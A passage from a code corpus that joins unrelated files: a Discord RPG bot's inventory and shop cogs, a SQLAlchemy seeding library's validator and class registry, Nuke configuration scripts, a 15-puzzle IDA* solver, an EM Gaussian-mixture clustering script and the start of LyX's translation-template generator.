# "Exp: {} / {}\n"
# "Location: {}".format(player.level,
# player.exp,
# player.next_level_exp(),
# player.location.name if player.location else None
# ),
# inline=False
# )
# embed.add_field(
# name='Stats',
# value="HP: {} / {}\n"
# "Strength: {}\n"
# "Defense: {}".format(player.current_hp,
# int(player.max_hp),
# int(player.strength),
# int(player.defense)),
# inline=False
# )
#
# embed.add_field(
# name='Others',
# value="Money: {}".format(player.money),
# inline=False
# )
#
# await ctx.send(embed=embed)
#
# @commands.command()
# async def heal(self, ctx):
# """Uses potion on the player's inventory"""
#
# @commands.command()
# async def daily(self, ctx):
# """Claim daily rewards, if already claimed show remaining time until next reward"""
#
# @commands.command()
# async def shop(self, ctx):
# """Shows list of items in the shop"""
# shop_items_string = '\n'.join([f"{item.name} cost:{item.money_value}" for item in self.shop_items])
#
# await ctx.send(shop_items_string)
# @commands.command()
# async def buy(self, ctx, *, item_name_amount: str):
#
# item_name, item_amount = split_str_int(item_name_amount)
#
# # if amount is not valid throw an error
# if item_amount <= 0:
# raise InvalidAmount('Amount reached zero or below zero.')
#
# # get user's player
# player = query_player(ctx.author.id)
#
# shop_item = get_item(item_name, self.shop_items)
#
# if shop_item:
# total_cost = shop_item.money_value * item_amount
#
# # check if money is enough before making transaction
# if total_cost > player.money:
# raise ValueError(f"Not enough money to buy '{item_name}'")
#
# # Deduct money
# player.money -= total_cost
#
# # check if item to be added is already in the character.items otherwise create object
# item = get_item(item_name, player.items)
# if item:
# item.amount += item_amount
# else:
# player.items.append(PlayerItem(item=shop_item, amount=item_amount))
# else:
# raise ItemNotFound
#
# await ctx.send('item added to inventory, new balance: {}'.format(player.money))
# session.commit()
#
# @buy.error
# async def buy_error(self, ctx, error):
# if isinstance(error, commands.MissingRequiredArgument):
# await self.shop(ctx)
#
# if isinstance(error, InvalidAmount):
# await ctx.send('invalid amount')
#
# if isinstance(error, ItemNotFound):
# await ctx.send('invalid item')
# @commands.command()
# async def sell(self, ctx, *, item_name_amount: str):
#
# item_name, item_amount = split_str_int(item_name_amount)
#
# # if amount is not valid throw an error
# if item_amount <= 0:
# raise InvalidAmount('Amount reached zero or below zero.')
#
# player = query_player(ctx.author.id)
#
# char_item: PlayerItem = get_item(item_name, player.items)
#
# if char_item:
#
# if char_item.item.is_sellable is False:
# raise ItemNotSellable
#
# if char_item.amount < item_amount:
# raise InsufficientAmount
#
# char_item.amount -= item_amount
#
# gain = char_item.item.money_value * item_amount
#
# # total gain is 80% of the calculated gain
# total_gain = int(gain * 0.8)
# player.money += total_gain
#
# await ctx.send('item sold, gained money: +{}'.format(total_gain))
# else:
# raise ItemNotFound
#
# session.commit()
#
# @sell.error
# async def sell_error(self, ctx, error):
# if isinstance(error, commands.MissingRequiredArgument):
# await ctx.send('item not specified')
#
# if isinstance(error, InvalidAmount):
# await ctx.send('invalid amount')
#
# if isinstance(error, ItemNotFound):
# await ctx.send('item not found')
#
# if isinstance(error, ItemNotSellable):
# await ctx.send('item not sellable')
#
# if isinstance(error, InsufficientAmount):
# await ctx.send('item amount is not enough')
@commands.command()
async def commit(self, ctx):
session.commit()
await ctx.send('done')
@commands.command()
async def flush(self, ctx):
session.flush()
await ctx.send('done')
@commands.command()
async def close(self, ctx):
session.close()
await ctx.send('done')
def setup(bot):
bot.add_cog(Adventurer(bot))
```
#### File: simple-rpg/cogs/inventory.py
```python
import random
import discord
from db import session
from discord.ext import commands
from cogs.utils.errors import ItemNotFound
from cogs.utils.stripper import strip_name_amount
from models import Armour
from models import Attribute
from models import Consumable
from models import Equipment
from models import EquipmentSlot
from models import Player
from models import PlayerItem
from models import User
from models import Weapon
# TODO: fix craft, blueprint, add
# Plan data in google sheets of the blueprint
# NOTE: self.item_plans is referenced in craftable()/craft() below but is never
# initialized in this cog, so those commands will fail until it is loaded.
class Inventory(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command()
async def items(self, ctx):
"""Show list of items"""
author_id = ctx.author.id
player = session.query(Player).join(User).filter(
User.discord_id == author_id
).one()
embed = discord.Embed(
title='Owned Items',
colour=discord.Colour.random()
)
for player_item in player.items:
if not isinstance(player_item.item, Equipment):
embed.add_field(
name=player_item.item.name,
value="+%s" % player_item.amount
)
await ctx.send(embed=embed)
@commands.command(aliases=['craftables', 'plans', 'plan'])
async def craftable(self, ctx: commands.Context):
"""Show list of craftable items"""
embed = discord.Embed(
title='Craftable Items with Materials',
colour=discord.Colour.purple()
)
embed.set_author(name=ctx.author.name, icon_url=ctx.author.avatar_url)
for item_plan in self.item_plans:
msg = '\n'.join([f"{mat.amount} {mat.item.name}" for mat in item_plan.materials])
embed.add_field(
name=item_plan.item.name,
value=msg
)
await ctx.send(content=f'**{ctx.author.name}**', embed=embed)
@commands.command()
async def craft(self, ctx: commands.Context, *, arg: str):
name, amount = strip_name_amount(arg)
author_id = ctx.author.id
# search for matched plan in plans
# item_plan = next((item_plan for item_plan in self.item_plans if name.lower() == item_plan.name.lower()), None)
try:
# search for matched plan in plans
item_plan = next(item_plan for item_plan in self.item_plans if name.lower() == item_plan.name.lower())
except StopIteration:
raise ItemNotFound('Item not found')
player = session.query(Player).filter(User.discord_id == author_id).one()
new_amounts = {}
success = True
lack_materials = []
for material in item_plan.materials:
# total amount of material
material_amount = material.amount * amount
# get player_item that matches material
player_item: PlayerItem = next(
(player_item for player_item in player.items if material.item == player_item.item), None)
if player_item:
if player_item.amount < material_amount:
success = False # raise an error or count how much is lacking
                    lack_materials.append({'item': player_item.item.name,  # PlayerItem has no .name; its item does
                                           'lack': player_item.amount - material_amount
})
else:
new_amounts[material.item.name] = player_item.amount - material_amount
else:
success = False # no matched player_item in the plan_materials
lack_materials.append({'item': material.item.name,
'lack': - material_amount
})
if success: # if success, overwrite amounts
for player_item in player.items:
if player_item.item.name in new_amounts:
player_item.amount = new_amounts[player_item.item.name]
if item_plan.item not in player.items:
new_player_item = PlayerItem(item=item_plan.item, amount=amount)
player.items.append(new_player_item)
else:
item = next(item for item in player.items if item == item_plan.item)
item.amount += amount
await ctx.send('success')
else:
embed = discord.Embed(
title='Craft failed',
colour=discord.Colour.dark_red()
)
msg = '\n'.join(f"{lack['lack']} {lack['item']}" for lack in lack_materials)
embed.add_field(
name='Missing materials',
value=msg
)
await ctx.send(embed=embed)
@craft.error
async def craft_error(self, ctx, error):
if isinstance(error, commands.MissingRequiredArgument):
await ctx.send('Please specify the item:')
await self.craftable(ctx)
if isinstance(error, ItemNotFound):
await ctx.send('Invalid item')
raise error
@commands.command()
async def equip(self, ctx, *, arg: str):
name = arg.lower()
player = session.query(Player).filter(User.discord_id == ctx.author.id).one()
try:
player_item = next(
player_item for player_item in player.items if
str(player_item.item.name).lower() == name
)
except StopIteration:
raise ValueError('No equipment found')
if not isinstance(player_item.item, Equipment):
raise ValueError('Item is not an equipment')
# # if not found throws sqlalchemy.orm.exc.NoResultFound
# equipment = session.query(Equipment).filter(PlayerItem.player_id == player.id).filter(
# func.lower(Equipment.name) == name.lower()
# ).one()
if player_item.amount == 0:
raise ValueError('Amount not enough')
if not player.equipment_set:
player.equipment_set = EquipmentSlot()
if isinstance(player_item.item, Weapon):
if player.equipment_set.weapon is not None:
player.attribute -= player.equipment_set.weapon.attribute
player.equipment_set.weapon = player_item.item
elif isinstance(player_item.item, Armour):
if player.equipment_set.shield is not None:
player.attribute -= player.equipment_set.shield.attribute
player.equipment_set.shield = player_item.item
player.attribute += player_item.item.attribute
player_item.amount -= 1
await ctx.send('equipped')
@commands.command()
async def equipped(self, ctx):
player: Player = session.query(Player).filter(User.discord_id == ctx.author.id).one()
embed = discord.Embed(
title='Equipped',
colour=discord.Colour.random()
)
embed.add_field(name='Weapon',
value=player.equipment_set.weapon.name if player.equipment_set and player.equipment_set.weapon
else "None")
embed.add_field(name='Shield',
value=player.equipment_set.shield.name if player.equipment_set and player.equipment_set.shield
else "None")
await ctx.send(embed=embed)
@commands.command()
async def equipments(self, ctx):
author_id = ctx.author.id
player = session.query(Player).filter(User.discord_id == author_id).one()
embed = discord.Embed(
title='Owned Items',
colour=discord.Colour.random()
)
for player_item in player.items:
if isinstance(player_item.item, Equipment):
embed.add_field(
name=player_item.item.name,
value="+%s" % player_item.amount
)
await ctx.send(embed=embed)
@commands.command()
async def use(self, ctx, *, arg: str):
name, amount = strip_name_amount(arg)
player = session.query(Player).filter(User.discord_id == ctx.author.id).one()
try:
player_item: PlayerItem = next(
player_item for player_item in player.items if
str(player_item.item.name).lower() == name.lower())
except StopIteration:
raise ValueError('Item to use not found')
if not isinstance(player_item.item, Consumable):
raise ValueError('cannot apply non-consumable item')
if player_item.amount < amount:
raise ValueError('Not enough amount')
while amount != 0:
if player_item.item.is_random_attr:
item_attribute: Attribute = player_item.item.attribute
# get dict of Attribute's attributes, ignores sqlalchemy instance, and 0 values
attrs = item_attribute.attrs
chosen = random.choice(attrs)
item_value = item_attribute.__getattribute__(chosen)
player_attr_value = player.__getattribute__(chosen)
if float(item_value).is_integer():
if chosen == 'max_hp':
player.max_hp += item_value
else:
player.__setattr__(chosen, (item_value + player_attr_value))
else:
player.attribute.__setattr__(chosen, round((item_value * player_attr_value) + player_attr_value))
else:
player.current_hp += player_item.item.attribute.current_hp
player.max_hp += player_item.item.attribute.max_hp
player.strength += player_item.item.attribute.strength
player.defense += player_item.item.attribute.defense
player_item.amount -= 1
amount -= 1
await ctx.send('item is used successfully')
def setup(bot):
bot.add_cog(Inventory(bot))
```
#### File: cogs/utils/stripper.py
```python
def strip_name_amount(arg: str):
"""
Strip the name and the last position integer
Args:
arg: string
Returns:
string and integer with the default value 1
"""
strings = arg.split()
try:
first = ' '.join(strings[:-1])
second = int(strings[-1])
except (ValueError, IndexError):
first = ' '.join(strings)
second = 1
return first, second
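# Examples (item names are illustrative):
#     strip_name_amount('iron sword 3')   -> ('iron sword', 3)
#     strip_name_amount('health potion')  -> ('health potion', 1)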
```
#### File: simple-rpg/data/locations.temp.py
```python
import yaml
from sqlalchemyseed import Seeder
from db.connector import session
def load_entities_from_yaml(filepath):
with open(filepath, 'r') as f:
return yaml.safe_load(f.read())
entities = load_entities_from_yaml('locations.yaml')
seeder = Seeder()
seeder.seed(entities, session)
print(seeder.instances)
print(entities)
# yaml.dump(entities, open('locations.yaml', 'r+'), sort_keys=False)
# session.commit()
```
#### File: simple-rpg/data/seed_items.py
```python
import json
from models import Raw
def load_items():
with open('items.json') as _json_file:
items = []
for item in json.load(_json_file):
if item['type'] == 'raw':
items.append(
Raw(
**item
)
)
return items
# session.add_all(items)
# session.commit()
```
#### File: simple-rpg/data/seed_modifiers.py
```python
import json
from models import Attribute, Modifier
def load_modifiers():
with open('modifiers.json') as _json_file:
modifiers = []
for modifier in json.load(_json_file):
modifiers.append(
Modifier(
prefix=modifier['prefix'],
attribute=Attribute(
**modifier['attribute']
),
bonus_exp=modifier['bonus_exp'],
bonus_money=modifier['bonus_money']
)
)
return modifiers
# session.add_all(modifiers)
# session.commit()
```
|
{
"source": "jedymatt/sqlalchemyseed",
"score": 3
}
|
#### File: src/sqlalchemyseed/class_registry.py
```python
import importlib
from . import errors, util
def parse_class_path(class_path: str):
"""
Parse the path of the class the specified class
"""
try:
module_name, class_name = class_path.rsplit('.', 1)
except ValueError as error:
raise errors.ParseError(
'Invalid module or class input format.') from error
# if class_name not in classes:
try:
class_ = getattr(importlib.import_module(module_name), class_name)
except AttributeError as error:
raise errors.NotInModuleError(
f"{class_name} is not found in module {module_name}.") from error
if util.is_supported_class(class_):
return class_
raise errors.UnsupportedClassError(
f"'{class_name}' is an unsupported class")
class ClassRegistry:
"""
Register classes
"""
def __init__(self):
self._classes = {}
def register_class(self, class_path: str):
"""
:param class_path: module.class (str)
:return: registered class
"""
if class_path not in self._classes:
self._classes[class_path] = parse_class_path(class_path)
return self._classes[class_path]
def __getitem__(self, class_path: str):
return self._classes[class_path]
@property
def classes(self) -> tuple:
"""
Return tuple of registered classes
"""
return tuple(self._classes)
def clear(self):
"""
Clear registered classes
"""
self._classes.clear()
```
#### File: src/sqlalchemyseed/validator.py
```python
from . import errors, util
class Key:
def __init__(self, name: str, type_):
self.name = name
self.type_ = type_
@classmethod
def model(cls):
return cls('model', str)
@classmethod
def data(cls):
return cls('data', dict)
@classmethod
def filter(cls):
return cls('filter', dict)
def is_valid_type(self, entity):
return isinstance(entity, self.type_)
def __str__(self):
return self.name
def __eq__(self, o: object) -> bool:
if isinstance(o, self.__class__):
return self.name == o.name and self.type_ == o.type_
if isinstance(o, str):
return self.name == o
return False
def __hash__(self):
return hash(self.name)
def check_model_key(entity: dict, entity_is_parent: bool):
model = Key.model()
if model not in entity and entity_is_parent:
raise errors.MissingKeyError("'model' key is missing.")
# check type_
if model in entity and not model.is_valid_type(entity[model]):
raise errors.InvalidTypeError("'model' data should be 'string'.")
def check_max_length(entity: dict):
if len(entity) > 2:
raise errors.MaxLengthExceededError("Length should not exceed by 2.")
def check_source_key(entity: dict, source_keys: list) -> Key:
source_key: Key = next(
(sk for sk in source_keys if sk in entity),
None
)
# check if current keys has at least, data or filter key
if source_key is None:
raise errors.MissingKeyError(
f"Missing {', '.join(map(str, source_keys))} key(s).")
return source_key
def check_source_data(source_data, source_key: Key):
if not isinstance(source_data, dict) and not isinstance(source_data, list):
raise errors.InvalidTypeError(
f"Invalid type_, {str(source_key)} should be either 'dict' or 'list'.")
if isinstance(source_data, list) and len(source_data) == 0:
raise errors.EmptyDataError(
"Empty list, 'data' or 'filter' list should not be empty.")
def check_data_type(item, source_key: Key):
if not source_key.is_valid_type(item):
raise errors.InvalidTypeError(
f"Invalid type_, '{source_key.name}' should be '{source_key.type_}'")
class SchemaValidator:
def __init__(self, source_keys, ref_prefix):
self._source_keys = source_keys
self._ref_prefix = ref_prefix
def validate(self, entities):
self._pre_validate(entities, entity_is_parent=True)
def _pre_validate(self, entities: dict, entity_is_parent=True):
if not isinstance(entities, dict) and not isinstance(entities, list):
raise errors.InvalidTypeError(
"Invalid type, should be list or dict")
if len(entities) == 0:
return
if isinstance(entities, dict):
return self._validate(entities, entity_is_parent)
# iterate list
for entity in entities:
self._pre_validate(entity, entity_is_parent)
def _validate(self, entity: dict, entity_is_parent=True):
check_max_length(entity)
check_model_key(entity, entity_is_parent)
# get source key, either data or filter key
source_key = check_source_key(entity, self._source_keys)
source_data = entity[source_key]
check_source_data(source_data, source_key)
if isinstance(source_data, list):
for item in source_data:
check_data_type(item, source_key)
# check if item is a relationship attribute
self.check_attributes(item)
else:
# source_data is dict
# check if item is a relationship attribute
self.check_attributes(source_data)
def check_attributes(self, source_data: dict):
for _, value in util.iter_ref_kwargs(source_data, self._ref_prefix):
self._pre_validate(value, entity_is_parent=False)
def validate(entities, ref_prefix='!'):
SchemaValidator(source_keys=[Key.data()], ref_prefix=ref_prefix) \
.validate(entities=entities)
def hybrid_validate(entities, ref_prefix='!'):
SchemaValidator(source_keys=[Key.data(), Key.filter()], ref_prefix=ref_prefix) \
.validate(entities=entities)
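# Usage sketch based on the keys defined above (entity values are illustrative):
#     validate({'model': 'tests.models.Person', 'data': {'name': 'John'}})
#     hybrid_validate({'model': 'tests.models.Person', 'filter': {'name': 'John'}})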
```
|
{
"source": "jedypod/nuke-conf",
"score": 3
}
|
#### File: jedypod/nuke-conf/init.py
```python
import nuke
import os, errno
# The folder of this init.py file
base_path = os.path.dirname(__file__)
pdirs = ['scripts']
for pdir in pdirs:
nuke.pluginAddPath(os.path.join(base_path, pdir))
# Callbacks
#---------------------------------------------------------------------------------------------
# If a write directory does not exist, create it automatically.
def create_write_directory():
directory = nuke.callbacks.filenameFilter(os.path.dirname(nuke.filename(nuke.thisNode())))
if directory and not os.path.isdir(directory):
        try:
            os.makedirs(directory)
        except OSError as e:  # "except (OSError, e)" is invalid Python 3 syntax
            if e.errno == errno.EEXIST:  # errno 17: the directory already exists
                pass
nuke.addBeforeRender(create_write_directory)
# Works around bug in node.dependent calls which sometimes return an empty list in error
# Only add callback if not in commandline render mode
def eval_deps():
nodes = nuke.allNodes()
if nodes:
_ = nodes[-1].dependent()
if '-X' not in nuke.rawArgs:
nuke.addOnScriptLoad(eval_deps)
```
#### File: scripts/nuketools/print_render_commands.py
```python
from __future__ import print_function
import nuke
nuke.menu('Nuke').addCommand('Render/Print Render Commands', 'print_render_commands.go(nuke.selectedNodes())', index=7)
def go(nodes):
print('#!/usr/bin/bash')
for n in nodes:
print('{0} -X {1} -F {2} --cont -f {3}'.format(
nuke.EXE_PATH, n.name(), n.frameRange(), nuke.root()['name'].getValue()))
```
|
{
"source": "Jed-Z/artificial-intelligence-lab",
"score": 3
}
|
#### File: E02_15puzzle/src/main.py
```python
import numpy as np
import datetime
def isGoal(node):
"""
Test if the given node (state) is the goal.
"""
goal = np.append(range(1, sidelen * sidelen), 0).reshape(sidelen, sidelen)
return (node == goal).all()
def h1(node):
"""
Heuristic function 1: using the number of misplaced tiles.
"""
goal = np.append(range(1, sidelen * sidelen), 0).reshape(sidelen, sidelen)
return sidelen * sidelen - np.count_nonzero(goal == node)
def h2(node):
"""
Heuristic function 2: using Manhattan distance.
"""
target = {}
count = 1
for i in range(sidelen):
for j in range(sidelen):
target[count] = (i, j)
count += 1
target[0] = (sidelen-1, sidelen-1)
total_distance = 0
for i in range(sidelen):
for j in range(sidelen):
val = node[i, j]
total_distance += abs(i - target[val][0]) + abs(j - target[val][1])
return total_distance
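# Worked example for h2: if tile 5 sits at (2, 3) and its goal cell is (1, 0),
# it contributes |2 - 1| + |3 - 0| = 4 to the total Manhattan distance.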
def ida_star(root):
"""
Do IDA* algorithm from node `root`.
"""
bound = h2(root) # initial bound
path = [root]
while True:
ret = search(path, 0, bound)
if ret == True:
return path
if ret == float('inf'):
return False
else:
bound = ret
def search(path, g, bound):
"""
Do the DFS.
"""
node = path[-1] # current node is the last node in the path
f = g + h2(node) # heuristic function
if f > bound:
return f
if isGoal(node):
return True
temp = np.where(node == 0) # find the blank
blank = (temp[0][0], temp[1][0]) # blank's position
succs = []
moves = [(0, -1), (0, 1), (-1, 0), (1, 0)] # up, down, left, right
for move in moves:
next_blank = tuple(np.sum([blank, move], axis=0))
        if 0 <= next_blank[0] < sidelen and 0 <= next_blank[1] < sidelen:
succ = node.copy()
succ[blank], succ[next_blank] = succ[next_blank], succ[blank]
succs.append(succ)
_min = float('inf')
succs.sort(key=lambda x: h2(x))
for succ in succs:
if not any((succ == x).all() for x in path): # special syntax
path.append(succ)
t = search(path, g+1, bound)
if t == True:
return True
if t < _min:
_min = t
path.pop()
return _min
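# search() either returns True (goal found within the bound) or the smallest
# f-value that exceeded the bound; ida_star() then restarts the DFS with that
# value as the new threshold, deepening by the minimum necessary amount.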
def makeActions(path):
    """
    Construct a list containing the numbers to be moved in each step.
    """
if path == False:
raise ValueError('No solution!')
actions = []
for i, node in enumerate(path[1:]):
temp = np.where(node == 0) # find the blank
blank = (temp[0][0], temp[1][0]) # blank's position
actions.append(path[i][blank])
return actions
if __name__ == '__main__':
print('***STARTING***', datetime.datetime.now().strftime('%Y.%m.%d %H:%M:%S'))
filename = 'mytest.txt'
puzzle = np.loadtxt(filename, dtype=np.uint8) # number 0 indicates the blank
sidelen = len(puzzle) # side length of puzzle
result = makeActions(ida_star(puzzle))
print(result)
print('Length:', len(result))
print('***Finished***', datetime.datetime.now().strftime('%Y.%m.%d %H:%M:%S'))
```
#### File: E13_EM/src/ggm_em.py
```python
import numpy as np
import matplotlib.pyplot as plt
# In[2]:
def loadData(filename):
    """Read the data set from a file."""
    dataSet = []
    id2country = []  # maps row index to country name
    with open(filename) as fr:
        for i, line in enumerate(fr.readlines()):
            curLine = line.strip().split(' ')
            fltLine = list(map(int, curLine[1:]))  # drop the first column (country name)
            dataSet.append(fltLine)
            id2country.append(curLine[0])
    return dataSet, id2country
# In[3]:
def prob(x, mu, sigma):
    """Probability density function of a multivariate Gaussian."""
    n = np.shape(x)[1]
    expOn = float(-0.5 * (x - mu) * (sigma.I) * ((x - mu).T))
    divBy = pow(2 * np.pi, n / 2) * pow(np.linalg.det(sigma), 0.5)
    return pow(np.e, expOn) / divBy
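# The function above implements
#     N(x | mu, Sigma) = exp(-0.5 (x - mu) Sigma^{-1} (x - mu)^T) / ((2 pi)^(n/2) |Sigma|^(1/2))
# where n is the dimensionality of x.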
# In[4]:
def EM(dataMat, maxIter=50):
    m, n = np.shape(dataMat)
    # 1. initialize the parameters of each Gaussian mixture component
    alpha = [1/3, 1/3, 1/3]  # initialize alpha (mixing coefficients)
    mu = [dataMat[1, :], dataMat[13, :], dataMat[11, :]]  # initialize mu (mean vectors)
    sigma = [np.mat((np.eye(7, dtype=float))) for x in range(3)]  # initialize the covariance matrices
    gamma = np.mat(np.zeros((m, 3)))
    for i in range(maxIter):
        for j in range(m):
            sumAlphaMulP = 0
            for k in range(3):
                gamma[j, k] = alpha[k] * prob(dataMat[j, :], mu[k], sigma[k])  # 4. posterior probability that component k generated sample j, i.e. gamma
                sumAlphaMulP += gamma[j, k]
            for k in range(3):
                gamma[j, k] /= sumAlphaMulP
        sumGamma = np.sum(gamma, axis=0)
        for k in range(3):
            mu[k] = np.mat(np.zeros((1, n)))
            sigma[k] = np.mat(np.zeros((n, n)))
            for j in range(m):
                mu[k] += gamma[j, k] * dataMat[j, :]
            mu[k] /= sumGamma[0, k]  # 7. compute the new mean vector
            for j in range(m):
                sigma[k] += gamma[j, k] * (dataMat[j, :] - mu[k]).T * (dataMat[j, :] - mu[k])
            sigma[k] /= sumGamma[0, k]  # 8. compute the new covariance matrix
            alpha[k] = sumGamma[0, k] / m  # 9. compute the new mixing coefficient
        for s in sigma:
            s += np.eye(7)  # add the identity to each covariance, presumably to keep it invertible
    print('gamma')
    [print(g) for g in gamma]
    print('\nmu')
    [print(m) for m in mu]
    print('\nsigma')
    [print(s) for s in sigma]
    return gamma
# In[5]:
def initCentroids(dataMat, k):
"""Init centroids with random samples."""
numSamples, dim = dataMat.shape
centroids = np.zeros((k, dim))
for i in range(k):
index = int(np.random.uniform(0, numSamples))
centroids[i, :] = dataMat[index, :]
return centroids
# In[6]:
def gaussianCluster(dataMat):
    """Cluster the samples using the EM posterior responsibilities."""
    m, n = np.shape(dataMat)
    k = 3  # number of mixture components, matching EM() above
    centroids = initCentroids(dataMat, k)  ## step 1: init centroids
    clusterAssign = np.mat(np.zeros((m, 2)))
    gamma = EM(dataMat)
    for i in range(m):
        # argmax gives the most responsible component, amax its posterior
        clusterAssign[i, :] = np.argmax(gamma[i, :]), np.amax(gamma[i, :])  # 15. cluster label lambda for sample x
    ## step 4: update centroids
    for j in range(k):
        pointsInCluster = dataMat[np.nonzero(clusterAssign[:, 0].A == j)[0]]
        centroids[j, :] = np.mean(pointsInCluster, axis=0)  # recompute the cluster mean vector
    return centroids, clusterAssign
# In[7]:
dataMat, id2country = loadData('football.txt')
dataMat = np.mat(dataMat)
centroids, clusterAssign = gaussianCluster(dataMat)
# In[8]:
result = ([], [], [])
for i, assign in enumerate(clusterAssign):
result[int(assign[0, 0])].append(id2country[i])
print('\n-------------------------------------------\n')
print('First-class:', result[0])
print('Second-class:', result[1])
print('Third-class:', result[2])
# In[ ]:
```
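A quick smoke test for `EM()` on synthetic data (not the `football.txt` input the script expects); the shape constraints below follow from the hard-coded seeds `dataMat[1/13/11, :]` and the `np.eye(7)` covariances:

```python
# Synthetic data: at least 14 rows and exactly 7 columns are required.
import numpy as np

np.random.seed(0)
toy = np.mat(np.random.rand(16, 7) * 5)
gamma = EM(toy, maxIter=5)  # responsibilities, shape (16, 3)
labels = np.asarray(np.argmax(gamma, axis=1)).ravel()
print(labels)
```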
|
{
"source": "Jedzia/alShaders",
"score": 2
}
|
#### File: alShaders/common/alShaders.py
```python
import pymel.core as pm
from mtoa.ui.ae.shaderTemplate import ShaderAETemplate
UI = {
'float': pm.attrFieldSliderGrp,
'rgb': pm.attrColorSliderGrp,
}
class Param:
name = ''
label = ''
annotation = ''
ptype = ''
presets = None
precision = 4
def __init__(self, n, l, a, p, presets=None, precision=4):
self.name = n
self.label = l
self.annotation = a
self.ptype = p
self.presets = presets
self.precision = precision
def setPresetFlt(ctrl, value):
attr = pm.attrFieldSliderGrp(ctrl, query=True, attribute=True)
pm.setAttr(attr, value)
def setPresetRgb(ctrl, value):
attr = pm.attrColorSliderGrp(ctrl, query=True, attribute=True)
pm.setAttr(attr + 'R', value[0])
pm.setAttr(attr + 'G', value[1])
pm.setAttr(attr + 'B', value[2])
class alShadersTemplate(ShaderAETemplate):
def customCreateFlt(self, attr):
# print "creating %s" % attr
pname = attr.split('.')[-1]
ptype = self.params[pname].ptype
plabel = self.params[pname].label
pann = self.params[pname].annotation
presets = self.params[pname].presets
precision = self.params[pname].precision
controlName = pname + 'Ctrl'
l = plabel
if presets is not None:
            l += ' <span>&#8801;</span>' # fix unicode problem in Windows using html
pm.attrFieldSliderGrp(controlName, attribute=attr, label=l, annotation=pann, precision=precision)
if presets is not None:
# pm.attrFieldSliderGrp(controlName, edit=True)
# pm.popupMenu()
# for k in sorted(presets, key=presets.get):
# pm.menuItem(label=k, command=pm.Callback(setPresetFlt, controlName, presets[k]))
attrChildren = pm.layout(controlName, query=True, childArray=True)
pm.popupMenu(button=1, parent=attrChildren[0])
for k in sorted(presets, key=presets.get):
pm.menuItem(label=k, command=pm.Callback(setPresetFlt, controlName, presets[k]))
def customUpdateFlt(self, attr):
# print "updating attr %s" % attr
pname = attr.split('.')[-1]
ptype = self.params[pname].ptype
controlName = pname + 'Ctrl'
pm.attrFieldSliderGrp(controlName, edit=True, attribute=attr)
def customCreateRgb(self, attr):
pname = attr.split('.')[-1]
ptype = self.params[pname].ptype
plabel = self.params[pname].label
pann = self.params[pname].annotation
presets = self.params[pname].presets
controlName = pname + 'Ctrl'
l = plabel
if presets is not None:
            l += ' <span>&#8801;</span>' # fix unicode problem in Windows using html
pm.attrColorSliderGrp(controlName, attribute=attr, label=l, annotation=pann)
if presets is not None:
# pm.attrColorSliderGrp(controlName, edit=True)
# pm.popupMenu()
attrChildren = pm.layout(controlName, query=True, childArray=True)
pm.popupMenu(button=1, parent=attrChildren[0])
for k in sorted(presets):
pm.menuItem(label=k, command=pm.Callback(setPresetRgb, controlName, presets[k]))
def customUpdateRgb(self, attr):
pname = attr.split('.')[-1]
ptype = self.params[pname].ptype
controlName = pname + 'Ctrl'
pm.attrColorSliderGrp(controlName, edit=True, attribute=attr)
def addCustomFlt(self, param):
self.addCustom(param, self.customCreateFlt, self.customUpdateFlt)
def addCustomRgb(self, param):
self.addCustom(param, self.customCreateRgb, self.customUpdateRgb)
def addRemapControls(self):
self.beginLayout('Remap', collapse=True)
self.addControl('RMPinputMin', label='Input min')
self.addControl('RMPinputMax', label='Input max')
self.beginLayout('Contrast', collapse=False)
self.addControl('RMPcontrast', label='Contrast')
self.addControl('RMPcontrastPivot', label='Pivot')
self.endLayout() # end Contrast
self.beginLayout('Bias and gain', collapse=False)
self.addControl('RMPbias', label='Bias')
self.addControl('RMPgain', label='Gain')
self.endLayout() # end Bias and gain
self.addControl('RMPoutputMin', label='Output min')
self.addControl('RMPoutputMax', label='Output max')
self.beginLayout('Clamp', collapse=False)
self.addControl('RMPclampEnable', label='Enable')
self.addControl('RMPthreshold', label='Expand')
self.addControl('RMPclampMin', label='Min')
self.addControl('RMPclampMax', label='Max')
self.endLayout() # end Clamp
self.endLayout() # end Remap
```
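A hypothetical AE template built on these helpers might look as follows; `alMyShader`, `strength` and `tint` are illustrative names, and this sketch only runs inside Maya with MtoA loaded:

```python
class AEalMyShaderTemplate(alShadersTemplate):
    params = {
        'strength': Param('strength', 'Strength', 'Overall effect strength',
                          'float', presets={'Off': 0.0, 'Full': 1.0}),
        'tint': Param('tint', 'Tint', 'Color tint', 'rgb'),
    }

    def setup(self):
        self.beginScrollLayout()
        self.addCustomFlt('strength')
        self.addCustomRgb('tint')
        self.addRemapControls()
        self.endScrollLayout()
```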
|
{
"source": "Jedzia/FernseherTest",
"score": 2
}
|
#### File: cmake/po/lyx_pot.py
```python
import sys, os, re, getopt
if sys.version_info < (2, 4, 0):
from sets import Set as set
def relativePath(path, base):
'''return relative path from top source dir'''
# full pathname of path
path1 = os.path.normpath(os.path.realpath(path)).split(os.sep)
path2 = os.path.normpath(os.path.realpath(base)).split(os.sep)
if path1[:len(path2)] != path2:
print "Path %s is not under top source directory" % path
    path3 = os.path.join(*path1[len(path2):])
# replace all \ by / such that we get the same comments on Windows and *nix
path3 = path3.replace('\\', '/')
return path3
def writeString(outfile, infile, basefile, lineno, string):
string = string.replace('\\', '\\\\').replace('"', '')
if string == "":
return
print >> outfile, '#: %s:%d\nmsgid "%s"\nmsgstr ""\n' % \
(relativePath(infile, basefile), lineno, string)
def ui_l10n(input_files, output, base):
'''Generate pot file from lib/ui/*'''
output = open(output, 'w')
Submenu = re.compile(r'^[^#]*Submenu\s+"([^"]*)"', re.IGNORECASE)
Popupmenu = re.compile(r'^[^#]*PopupMenu\s+"[^"]+"\s+"([^"]*)"', re.IGNORECASE)
IconPalette = re.compile(r'^[^#]*IconPalette\s+"[^"]+"\s+"([^"]*)"', re.IGNORECASE)
Toolbar = re.compile(r'^[^#]*Toolbar\s+"[^"]+"\s+"([^"]*)"', re.IGNORECASE)
Item = re.compile(r'[^#]*Item\s+"([^"]*)"', re.IGNORECASE)
TableInsert = re.compile(r'[^#]*TableInsert\s+"([^"]*)"', re.IGNORECASE)
for src in input_files:
input = open(src)
for lineno, line in enumerate(input.readlines()):
if Submenu.match(line):
(string,) = Submenu.match(line).groups()
string = string.replace('_', ' ')
elif Popupmenu.match(line):
(string,) = Popupmenu.match(line).groups()
elif IconPalette.match(line):
(string,) = IconPalette.match(line).groups()
elif Toolbar.match(line):
(string,) = Toolbar.match(line).groups()
elif Item.match(line):
